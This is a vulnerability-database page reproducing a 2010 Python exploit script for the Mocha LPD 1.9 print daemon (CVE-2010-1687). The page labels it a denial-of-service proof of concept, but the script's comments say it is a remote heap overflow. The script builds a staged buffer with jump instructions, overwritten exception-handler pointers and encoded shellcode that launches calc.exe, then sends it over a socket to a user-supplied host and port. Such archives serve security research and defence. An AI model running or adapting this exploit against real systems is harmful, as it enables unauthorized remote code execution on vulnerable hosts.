Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mocha LPD 1.9 - Remote Buffer Overflow DoS PoC

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 18 Views

Mocha LPD 1.9 - Remote Buffer Overflow DoS Proof of Concep

Code

                                                #!/usr/bin/python
# Mocha LPD v1.9 Remote Heap Overflow Exploit
# ol skool 'write 4'
# whoops, I said it was a DoS. My bad. 
# btw yes, I know its 2010 :0)
# CVE: 2010-1687
# tested on XP sp1 
# (use anti debugging to see it work - !hidedebug zwqueryinformationprocess)
# 
# call trace:
# ntdll.RtlAllocateHeap Called from=lpd.0041520B

import sys, socket

print "********************************************************"
print "          Mocha LPD Heap Buffer Overflow Code Execution"
print "                     by mr_me"
print "********************************************************"

if len(sys.argv) < 3:
	print "Usage: " + sys.argv[0] + " <target ip> <port>"
	sys.exit(0)

stage1 = "\x90\x90"
stage1 += "\x61" * 10
stage1 += "\x5b" * 2
stage1 += "\x03\xd2" * 5
stage1 += "\x03\xda" * 47
stage1 += "\xeb\x12"		# jmp down to stage2

stage2 = "\x03\xda" * 125

# aligned to ebx, executes calc.exe via a hardcoded winExec()
# ascii encoded lowercase

sc = ("j314d34djq34djk34d1431s11s7j314d34dj234dkms502ds5o0d35upj02b8"
"8731220222b6f507879729d088b9ck0ngmb9e910")

exploit = "\x05\x64\x65\x66\x61\x75\x6c\x74\x20"
exploit += "\xcc" * (975-len(stage1))
exploit += stage1
exploit += "\xeb\x86"		# jmp up to stage1
exploit += "\x44" * 6
exploit += "\xad\xbb\xc3\x77"	# ECX 0x77C3BBAD --> call dword ptr ds:[EDI+74]
exploit += "\xb4\x73\xed\x77"	# EAX 0x77ED73B4 --> ptr to UnhandledExceptionFilter()
exploit += stage2
exploit += "\x90" * 38		# offset to ebx pointed shellcode
exploit += sc
exploit += "\xcc" * (1500-len(exploit))
exploit += "\x20\x61\x6c\x6c\x0a"

host = sys.argv[1]
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
	connect = s.connect((host,port))
except:
	print "[-] Cant connect!"

s.send("\x02")
print "[+] Sending evil payload.. ph33r o.O"
s.send(exploit)
print '[+] Check for the calc!'
s.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
mocha lpd 1.9remote buffer overflowproof of conceptheap overflowexploitcve 2010-1687code executionxp sp1anti debuggingbuffer overflownetwork socketcall tracewinexecunhandled exception filterremote execution.
18